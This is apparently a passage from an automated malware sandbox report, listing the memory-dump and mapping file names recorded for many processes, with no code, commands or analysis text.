  • memory/4404-444-0x0000000000400000-0x0000000000438000-memory.dmp
  • memory/4412-259-0x0000000000000000-mapping.dmp
  • memory/4412-260-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/4428-596-0x0000000000000000-mapping.dmp
  • memory/4448-834-0x0000000000000000-mapping.dmp
  • memory/4448-1105-0x0000000000000000-mapping.dmp
  • memory/4448-860-0x0000000000000000-mapping.dmp
  • memory/4448-862-0x0000000000000000-mapping.dmp
  • memory/4448-864-0x0000000000000000-mapping.dmp
  • memory/4448-866-0x0000000000000000-mapping.dmp
  • memory/4448-868-0x0000000000000000-mapping.dmp
  • memory/4448-870-0x0000000000000000-mapping.dmp
  • memory/4448-872-0x0000000000000000-mapping.dmp
  • memory/4448-874-0x0000000000000000-mapping.dmp
  • memory/4448-876-0x0000000000000000-mapping.dmp
  • memory/4448-878-0x0000000000000000-mapping.dmp
  • memory/4448-880-0x0000000000000000-mapping.dmp
  • memory/4448-882-0x0000000000000000-mapping.dmp
  • memory/4448-886-0x0000000000000000-mapping.dmp
  • memory/4448-801-0x0000000000500000-0x0000000000501000-memory.dmp
  • memory/4448-802-0x0000000000000000-mapping.dmp
  • memory/4448-894-0x0000000000000000-mapping.dmp
  • memory/4448-856-0x0000000000000000-mapping.dmp
  • memory/4448-896-0x0000000000000000-mapping.dmp
  • memory/4448-803-0x00000000005C0000-0x00000000005C1000-memory.dmp
  • memory/4448-898-0x0000000000000000-mapping.dmp
  • memory/4448-900-0x0000000000000000-mapping.dmp
  • memory/4448-804-0x0000000000000000-mapping.dmp
  • memory/4448-902-0x0000000000000000-mapping.dmp
  • memory/4448-904-0x0000000000000000-mapping.dmp
  • memory/4448-906-0x0000000000000000-mapping.dmp
  • memory/4448-908-0x0000000000000000-mapping.dmp
  • memory/4448-910-0x0000000000000000-mapping.dmp
  • memory/4448-912-0x0000000000000000-mapping.dmp
  • memory/4448-914-0x0000000000000000-mapping.dmp
  • memory/4448-918-0x0000000000000000-mapping.dmp
  • memory/4448-920-0x0000000000000000-mapping.dmp
  • memory/4448-922-0x0000000000000000-mapping.dmp
  • memory/4448-916-0x0000000000000000-mapping.dmp
  • memory/4448-924-0x0000000000000000-mapping.dmp
  • memory/4448-928-0x0000000000000000-mapping.dmp
  • memory/4448-930-0x0000000000000000-mapping.dmp
  • memory/4448-926-0x0000000000000000-mapping.dmp
  • memory/4448-932-0x0000000000000000-mapping.dmp
  • memory/4448-934-0x0000000000000000-mapping.dmp
  • memory/4448-806-0x0000000000000000-mapping.dmp
  • memory/4448-940-0x0000000000000000-mapping.dmp
  • memory/4448-808-0x0000000000000000-mapping.dmp
  • memory/4448-944-0x0000000000000000-mapping.dmp
  • memory/4448-810-0x0000000000000000-mapping.dmp
  • memory/4448-948-0x0000000000000000-mapping.dmp
  • memory/4448-951-0x0000000000000000-mapping.dmp
  • memory/4448-854-0x0000000000000000-mapping.dmp
  • memory/4448-957-0x0000000000000000-mapping.dmp
  • memory/4448-812-0x0000000000000000-mapping.dmp
  • memory/4448-814-0x0000000000000000-mapping.dmp
  • memory/4448-962-0x0000000000000000-mapping.dmp
  • memory/4448-816-0x0000000000000000-mapping.dmp
  • memory/4448-968-0x0000000000000000-mapping.dmp
  • memory/4448-818-0x0000000000000000-mapping.dmp
  • memory/4448-820-0x0000000000000000-mapping.dmp
  • memory/4448-970-0x0000000000000000-mapping.dmp
  • memory/4448-845-0x0000000000000000-mapping.dmp
  • memory/4448-972-0x0000000000000000-mapping.dmp
  • memory/4448-975-0x0000000000000000-mapping.dmp
  • memory/4448-822-0x0000000000000000-mapping.dmp
  • memory/4448-852-0x0000000000000000-mapping.dmp
  • memory/4448-824-0x0000000000000000-mapping.dmp
  • memory/4448-982-0x0000000000000000-mapping.dmp
  • memory/4448-826-0x0000000000000000-mapping.dmp
  • memory/4448-984-0x0000000000000000-mapping.dmp
  • memory/4448-828-0x0000000000000000-mapping.dmp
  • memory/4448-830-0x0000000000000000-mapping.dmp
  • memory/4448-990-0x0000000000000000-mapping.dmp
  • memory/4448-840-0x0000000000000000-mapping.dmp
  • memory/4448-999-0x0000000000000000-mapping.dmp
  • memory/4448-1116-0x0000000000000000-mapping.dmp
  • memory/4448-1001-0x0000000000000000-mapping.dmp
  • memory/4448-1115-0x0000000006B90000-0x0000000006B91000-memory.dmp
  • memory/4448-1113-0x0000000000000000-mapping.dmp
  • memory/4448-1005-0x0000000000000000-mapping.dmp
  • memory/4448-1010-0x0000000000000000-mapping.dmp
  • memory/4448-1111-0x0000000000000000-mapping.dmp
  • memory/4448-1014-0x0000000000000000-mapping.dmp
  • memory/4448-1016-0x0000000000000000-mapping.dmp
  • memory/4448-1019-0x0000000000000000-mapping.dmp
  • memory/4448-1109-0x0000000000000000-mapping.dmp
  • memory/4448-1021-0x0000000000000000-mapping.dmp
  • memory/4448-1024-0x0000000000000000-mapping.dmp
  • memory/4448-1107-0x0000000000000000-mapping.dmp
  • memory/4448-1026-0x0000000000000000-mapping.dmp
  • memory/4448-1028-0x0000000000000000-mapping.dmp
  • memory/4448-1030-0x0000000000000000-mapping.dmp
  • memory/4448-1032-0x0000000000000000-mapping.dmp
  • memory/4448-1034-0x0000000000000000-mapping.dmp
  • memory/4448-1036-0x0000000000000000-mapping.dmp
  • memory/4448-1039-0x0000000000000000-mapping.dmp
  • memory/4448-1041-0x0000000000000000-mapping.dmp
  • memory/4448-832-0x0000000000000000-mapping.dmp
  • memory/4448-1043-0x0000000000000000-mapping.dmp
  • memory/4448-1045-0x0000000000000000-mapping.dmp
  • memory/4448-1047-0x0000000000000000-mapping.dmp
  • memory/4448-1049-0x0000000000000000-mapping.dmp
  • memory/4448-1051-0x0000000000000000-mapping.dmp
  • memory/4448-1053-0x0000000000000000-mapping.dmp
  • memory/4448-1055-0x0000000000000000-mapping.dmp
  • memory/4448-1057-0x0000000000000000-mapping.dmp
  • memory/4448-1059-0x0000000000000000-mapping.dmp
  • memory/4448-1061-0x0000000000000000-mapping.dmp
  • memory/4448-1063-0x0000000000000000-mapping.dmp
  • memory/4448-1065-0x0000000000000000-mapping.dmp
  • memory/4448-1067-0x0000000000000000-mapping.dmp
  • memory/4448-1069-0x0000000000000000-mapping.dmp
  • memory/4448-1071-0x0000000000000000-mapping.dmp
  • memory/4448-1073-0x0000000000000000-mapping.dmp
  • memory/4448-1075-0x0000000000000000-mapping.dmp
  • memory/4448-1077-0x0000000000000000-mapping.dmp
  • memory/4448-1079-0x0000000000000000-mapping.dmp
  • memory/4448-1081-0x0000000000000000-mapping.dmp
  • memory/4448-1083-0x0000000000000000-mapping.dmp
  • memory/4448-1085-0x0000000000000000-mapping.dmp
  • memory/4448-1087-0x0000000000000000-mapping.dmp
  • memory/4448-1091-0x0000000000000000-mapping.dmp
  • memory/4448-1089-0x0000000000000000-mapping.dmp
  • memory/4448-1093-0x0000000000000000-mapping.dmp
  • memory/4448-1095-0x0000000000000000-mapping.dmp
  • memory/4448-1099-0x0000000000000000-mapping.dmp
  • memory/4448-1101-0x0000000000000000-mapping.dmp
  • memory/4448-1103-0x0000000000000000-mapping.dmp
  • memory/4448-858-0x0000000000000000-mapping.dmp
  • memory/4448-1097-0x0000000000000000-mapping.dmp
  • memory/4464-120-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/4464-221-0x0000000007D00000-0x0000000007D01000-memory.dmp
  • memory/4464-199-0x00000000073C0000-0x00000000073C1000-memory.dmp
  • memory/4464-157-0x0000000007610000-0x0000000007611000-memory.dmp
  • memory/4464-154-0x00000000075A0000-0x00000000075A1000-memory.dmp
  • memory/4464-109-0x0000000000000000-mapping.dmp
  • memory/4464-143-0x0000000007240000-0x0000000007241000-memory.dmp
  • memory/4464-124-0x0000000006530000-0x0000000006531000-memory.dmp
  • memory/4464-151-0x00000000072E0000-0x00000000072E1000-memory.dmp
  • memory/4464-127-0x0000000006BA0000-0x0000000006BA1000-memory.dmp
  • memory/4468-600-0x00000000004015C6-mapping.dmp
  • memory/4472-24-0x0000000000000000-mapping.dmp
  • memory/4472-25-0x0000000000000000-mapping.dmp
  • memory/4480-699-0x0000000000000000-mapping.dmp
  • memory/4480-1122-0x0000000000000000-mapping.dmp
  • memory/4480-705-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/4504-1114-0x0000000050480000-0x000000005049A000-memory.dmp
  • memory/4504-682-0x0000000002A60000-0x0000000002ABC000-memory.dmp
  • memory/4504-788-0x0000000004C20000-0x0000000004C71000-memory.dmp
  • memory/4504-571-0x0000000000000000-mapping.dmp
  • memory/4572-690-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/4572-674-0x0000000000000000-mapping.dmp
  • memory/4624-890-0x000000000041A684-mapping.dmp
  • memory/4660-617-0x00000000050D0000-0x000000000510D000-memory.dmp
  • memory/4660-577-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/4660-574-0x0000000000000000-mapping.dmp
  • memory/4660-578-0x00000000004E0000-0x00000000004E1000-memory.dmp
  • memory/4664-700-0x0000000000000000-mapping.dmp
  • memory/4664-706-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/4668-279-0x0000000000000000-mapping.dmp
  • memory/4668-284-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/4672-1124-0x0000000000000000-mapping.dmp
  • memory/4724-96-0x0000000000000000-mapping.dmp
  • memory/4788-1009-0x0000000000000000-mapping.dmp
  • memory/4804-604-0x00000000002E0000-0x0000000000373000-memory.dmp
  • memory/4804-606-0x00000000002E0000-0x0000000000373000-memory.dmp
  • memory/4804-603-0x0000000000000000-mapping.dmp
  • memory/4828-1289-0x0000000004CF0000-0x0000000004D41000-memory.dmp
  • memory/4828-963-0x0000000000000000-mapping.dmp
  • memory/4828-1199-0x0000000002A70000-0x0000000002ACC000-memory.dmp
  • memory/4852-991-0x0000000000000000-mapping.dmp
  • memory/4868-181-0x0000000000000000-mapping.dmp
  • memory/4912-708-0x0000000000000000-mapping.dmp
  • memory/4912-721-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/4960-252-0x0000000000000000-mapping.dmp
  • memory/4984-592-0x0000000000000000-mapping.dmp
  • memory/5044-97-0x0000000000000000-mapping.dmp
  • memory/5052-758-0x0000000000400000-0x0000000000493000-memory.dmp
  • memory/5052-760-0x000000000043FA56-mapping.dmp
  • memory/5052-762-0x0000000000400000-0x0000000000493000-memory.dmp
  • memory/5056-1120-0x0000000000400000-0x0000000000418000-memory.dmp
  • memory/5056-1119-0x000000000040DDD4-mapping.dmp
  • memory/5056-1118-0x0000000000400000-0x0000000000418000-memory.dmp
  • memory/5096-314-0x0000000000000000-mapping.dmp
  • memory/5104-703-0x0000000000000000-mapping.dmp
  • memory/5104-709-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/5112-186-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/5112-173-0x0000000000000000-mapping.dmp
  • memory/5116-443-0x0000000000400000-0x0000000000424000-memory.dmp
  • memory/5116-441-0x000000000041A684-mapping.dmp
  • memory/5116-439-0x0000000000400000-0x0000000000424000-memory.dmp
  • memory/5132-1218-0x0000000000000000-mapping.dmp
  • memory/5132-1225-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/5168-712-0x0000000000000000-mapping.dmp
  • memory/5168-727-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/5216-1193-0x0000000000000000-mapping.dmp
  • memory/5240-1221-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/5240-1216-0x0000000000000000-mapping.dmp
  • memory/5252-720-0x0000000000000000-mapping.dmp
  • memory/5260-716-0x0000000000000000-mapping.dmp
  • memory/5260-730-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/5284-885-0x0000000000417A8B-mapping.dmp
  • memory/5284-889-0x0000000000400000-0x0000000000438000-memory.dmp
  • memory/5300-763-0x0000000000070000-0x0000000000071000-memory.dmp
  • memory/5300-1126-0x0000000006730000-0x0000000006777000-memory.dmp
  • memory/5300-752-0x0000000000000000-mapping.dmp
  • memory/5300-757-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/5356-1125-0x0000000000000000-mapping.dmp
  • memory/5380-1222-0x0000000000000000-mapping.dmp
  • memory/5380-1230-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/5404-837-0x0000000000000000-mapping.dmp
  • memory/5416-734-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/5416-726-0x0000000000000000-mapping.dmp
  • memory/5476-1185-0x0000000000000000-mapping.dmp
  • memory/5484-935-0x0000000000000000-mapping.dmp
  • memory/5484-939-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/5504-736-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/5504-728-0x0000000000000000-mapping.dmp
  • memory/5512-981-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/5512-976-0x0000000000000000-mapping.dmp
  • memory/5552-1018-0x0000000000000000-mapping.dmp
  • memory/5560-1117-0x0000000000000000-mapping.dmp
  • memory/5584-1123-0x0000000000000000-mapping.dmp
  • memory/5608-1214-0x0000000000000000-mapping.dmp
  • memory/5608-1219-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/5620-739-0x00007FF863EB0000-0x00007FF86489C000-memory.dmp
  • memory/5620-732-0x0000000000000000-mapping.dmp
  • memory/5660-1158-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/5660-1156-0x000000000040616E-mapping.dmp
  • memory/5688-1220-0x0000000000000000-mapping.dmp
  • memory/5688-1227-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/5704-1256-0x00000171FBC30000-0x00000171FBC31000-memory.dmp
  • memory/5704-1210-0x0000000000000000-mapping.dmp
  • memory/5704-1213-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/5724-1211-0x0000000000000000-mapping.dmp
  • memory/5724-1215-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/5848-1187-0x0000000000000000-mapping.dmp
  • memory/5848-1191-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/5848-1188-0x0000000000000000-mapping.dmp
  • memory/5852-1169-0x000000006E950000-0x000000006F03E000-memory.dmp
  • memory/5852-1166-0x0000000000403BEE-mapping.dmp
  • memory/5888-835-0x0000000000000000-mapping.dmp
  • memory/5904-1226-0x0000000000000000-mapping.dmp
  • memory/5904-1234-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/6020-1239-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/6020-1233-0x0000000000000000-mapping.dmp
  • memory/6028-1023-0x0000000000000000-mapping.dmp
  • memory/6060-1217-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/6060-1212-0x0000000000000000-mapping.dmp
  • memory/6196-1241-0x00007FF8627F0000-0x00007FF8631DC000-memory.dmp
  • memory/6196-1235-0x0000000000000000-mapping.dmp
  • memory/6636-1362-0x0000000000000000-mapping.dmp
  • memory/7132-1300-0x000000000040DDD4-mapping.dmp